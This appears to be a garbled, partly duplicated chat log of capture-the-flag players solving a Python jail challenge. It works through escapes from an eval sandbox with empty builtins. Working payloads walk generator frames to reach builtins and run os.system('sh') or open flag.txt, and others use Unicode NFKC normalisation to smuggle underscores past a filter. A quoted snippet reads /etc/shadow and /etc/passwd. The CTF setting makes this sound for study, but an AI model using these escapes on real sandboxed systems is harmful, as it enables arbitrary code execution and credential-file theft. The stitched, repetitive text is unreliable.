./flag.txt
nc byuctf.xyz 40006
Files:Tags: Hard
(print:=(1 for _ in []))and(print.throw)(print:=(1 for _ in []))and(print.throw) __s?__traceback__ to traverse up from there i thinktr.__traceback__.tb_frame.f_back.f_globals["__builtins__"]__builtins__ butgi_frame? (edited)print.gi_code.replace()replace(*, co_argcount=-1, co_posonlyargcount=-1, co_kwonlyargcount=-1, co_nlocals=-1, co_stacksize=-1, co_flags=-1, co_firstlineno=-1, co_code=None, co_consts=None, co_names=None, co_varnames=None, co_freevars=None, co_cellvars=None, co_filename=None, co_name=None, co_qualname=None, co_linetable=None, co_exceptiontable=None) method of builtins.code instance
Return a copy of the code object with new values for the specified fields.
(END)replace(co_code=b'asdasd')<some func to nuke code of>.__code__ = <our code> needs dunders :< (edited)(print:=(1 for _ in []))and(print.gi_frame.f_back.f_back.f_builtins)AttributeError: 'NoneType' object has no attribute 'f_back'try:
"legoclonesiswatching"/2
except Exception as e:
tr = e.__traceback__gi_yieldfrom?
Calling locals() inside a comprehension now includes variables from outside the comprehension, and no longer includes the synthetic .0 variable for the comprehension "argument". doesnt seem useful but also coooladaptive is described under CACHE documentation:
Rather than being an actual instruction, this opcode is used to mark extra space for the interpreter to cache useful data directly in the bytecode itself. It is automatically hidden by all dis utilities, but can be viewed with show_caches=True.
Logically, this space is part of the preceding instruction. Many opcodes expect to be followed by an exact number of caches, and will instruct the interpreter to skip over them at runtime.
Populated caches can look like arbitrary instructions, so great care should be taken when reading or modifying raw, adaptive bytecode containing quickened data.
New in version 3.11. dis describes this as adaptive(await 1for i in [1]) lolobjs=[(await 1 for i in [])]
def recurse(o,depth=0):
print(o)
print(type(o))
if type(o) == int: return
if type(o) == bool: return
if type(o) == str: return
if type(o) == bytes: return
if type(o) == float: return
if depth > 10:
return
keys = set(dir(o))
keys = set(dir(type(o)))
if hasattr(o, "keys"):
try:
keys |= o.keys()
except:
pass
for n in filter(lambda x: "__" not in x, keys):
print(" "*depth,end="--> ")
print(n, end=" ")
try:
if n in o:
recurse(o[n])
else:
recurse(getattr(o,n),depth+1)
except:
recurse(getattr(o,n),depth+1)
for o in objs:
recurse(o)f_back is always none# will never be true because get_output has a newline at the end?
if output[-4:] == "root":
output += "$ cat /etc/shadow\n"
output += get_output("$ cat /etc/shadow")
else:
output += "$ cat /etc/passwd\n"
# why no "$" here?
output += get_output("cat /etc/passwd")
(output is actually a lookup into a dict, so mutable outside the code object), but there seem to be some more co_consts (namely \u202eXOR and nuivyg)$ ?except Exception as e needs Exception))objs=[(await 1 for i in [])]
def recurse(o,depth=0):
print(o)
print(type(o))
if type(o) == int: return
if type(o) == bool: return
if type(o) == str: return
if type(o) == bytes: return
if type(o) == float: return
if depth > 10:
return
keys = set(dir(o))
keys = set(dir(type(o)))
if hasattr(o, "keys"):
try:
keys |= o.keys()
except:
pass
for n in filter(lambda x: "__" not in x, keys):
print(" "*depth,end="--> ")
print(n, end=" ")
try:
if n in o:
recurse(o[n])
else:
recurse(getattr(o,n),depth+1)
except:
recurse(getattr(o,n),depth+1)
for o in objs:
recurse(o) Last but not least, we have three exception fields (f_exc_type, f_exc_value and f_exc_traceback), which are rather particular to generators i found this on a shady corner of the internet (edited)Last but not least, we have three exception fields (f_exc_type, f_exc_value and f_exc_traceback), which are rather particular to generators i found this on a shady corner of the internet (edited)
byuctf{unicode_is_always_the_solution...}{}.__class__.__base__.__subclasses__()[-6]("","",["flag.txt"],["."])from unicodedata import normalize
for i in range(0x110000):
if "_" in normalize("NFKC", chr(i)):
print(chr(i))︳
︴
﹍
﹎
﹏
_ₚ gets normalized to p as wellint('𑱖') it gives you 6︳
︴
﹍
﹎
﹏
_ from unicodedata import normalize
for i in range(0x110000):
if "_" in normalize("NFKC", chr(i)):
print(chr(i)) ︳
__file__ would give you the same as __file__ but using one character less... but like two more bytes__file__ would give you the same as __file__ but using one character less... but like two more bytes fi normalises to 2 letters? (edited)fl for fl and then fill up using ag__file__ would give you the same as __file__ but using one character less... but like two more bytes (f:=(1 for _ in []))and(f.gi_frame.f_back.f_back.f_globals["_""_loader""_""_"].load_module("os").system("sh")) 3.11 is a much happier placeinp = input("code> ")
if "__" in inp or any(ord(c)>0x7f for c in inp):
print("Nope")
else:
print(eval(inp, {"__builtins__": {}}, {"__builtins__": {}})) (edited)[*([x.append((x[0].gi_frame.f_back.f_back.f_globals for _ in[1])) or x[0]for x in[[]]][0])][0]['_''_builtins_''_'] self ref makes a generator that is executing, which means f_back is preserved and you can use it to get globals (edited)[*([x.append((x[0].gi_frame.f_back.f_back.f_builtins for _ in[1])) or x[0]for x in[[]]][0])][0] ok the golf begins[*([x.append((x[0].gi_frame.f_back.f_back.f_builtins for _ in[1])) or x[0]for x in[[]]][0])][0] ok the golf begins (x:=[])or(a:=(a.gi_frame.f_back.f_back.f_builtins for a in x))and(x.append(a))or[*a][0][x:=[],a:=(a.gi_frame.f_back.f_back.f_builtins for a in x),x.append(a),*a][-1][x:=[],x.append(a:=(b.gi_frame.f_back.f_back.f_builtins for b in x)),*a][-1][*[x:=[],x.append(a:=(b.gi_frame.f_back.f_back.f_builtins for b in x)),*a][2]['open']('flag.txt')]
or for a shell I guess
[x:=[],x.append(a:=(b.gi_frame.f_back.f_back.f_builtins for b in x)),*a][2]['_''_import_''_']('os').system('sh')